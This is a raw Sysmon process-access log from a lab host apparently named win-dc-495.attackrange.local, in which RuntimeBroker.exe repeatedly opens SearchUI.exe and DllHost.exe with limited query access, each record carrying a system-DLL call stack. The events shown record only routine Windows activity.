13:58:36.586{59A5CD1D-93F9-6005-F104-00000000A301}45406168C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012762Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.586{59A5CD1D-93F9-6005-F104-00000000A301}45406168C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x800000000000000012761Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.523{59A5CD1D-93F9-6005-F104-00000000A301}45406168C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012760Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.523{59A5CD1D-93F9-6005-F104-00000000A301}45406168C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012759Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.336{59A5CD1D-93F9-6005-F104-00000000A301}45405484C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9407-6005-0905-00000000A301}4240C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\shcore.dll+35576|C:\Windows\System32\shcore.dll+201ef|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a 10341000x800000000000000012758Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.336{59A5CD1D-93F9-6005-F104-00000000A301}45405484C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9407-6005-0905-00000000A301}4240C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\shcore.dll+35576|C:\Windows\System32\shcore.dll+201ef|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a 10341000x800000000000000012757Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.320{59A5CD1D-93F9-6005-F104-00000000A301}45405152C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9407-6005-0905-00000000A301}4240C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\shcore.dll+35576|C:\Windows\System32\shcore.dll+201ef|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a 10341000x800000000000000012756Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.320{59A5CD1D-93F9-6005-F104-00000000A301}45405484C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9407-6005-0905-00000000A301}4240C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\shcore.dll+35576|C:\Windows\System32\shcore.dll+201ef|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+5ff03|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a 10341000x800000000000000012755Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.242{59A5CD1D-93F9-6005-F104-00000000A301}45405656C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000012754Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.242{59A5CD1D-93F9-6005-F104-00000000A301}45405656C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x800000000000000012753Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.242{59A5CD1D-93F9-6005-F104-00000000A301}45405656C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000012752Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.242{59A5CD1D-93F9-6005-F104-00000000A301}45405656C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x800000000000000012751Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.242{59A5CD1D-93F9-6005-F104-00000000A301}45405176C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000012750Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.242{59A5CD1D-93F9-6005-F104-00000000A301}45405656C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000012749Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.242{59A5CD1D-93F9-6005-F104-00000000A301}45405176C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x800000000000000012748Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.242{59A5CD1D-93F9-6005-F104-00000000A301}45405656C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x800000000000000012747Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.242{59A5CD1D-93F9-6005-F104-00000000A301}45405656C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000012746Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.242{59A5CD1D-93F9-6005-F104-00000000A301}45405176C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000012745Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.242{59A5CD1D-93F9-6005-F104-00000000A301}45405656C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x800000000000000012744Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.242{59A5CD1D-93F9-6005-F104-00000000A301}45405176C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x800000000000000012743Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
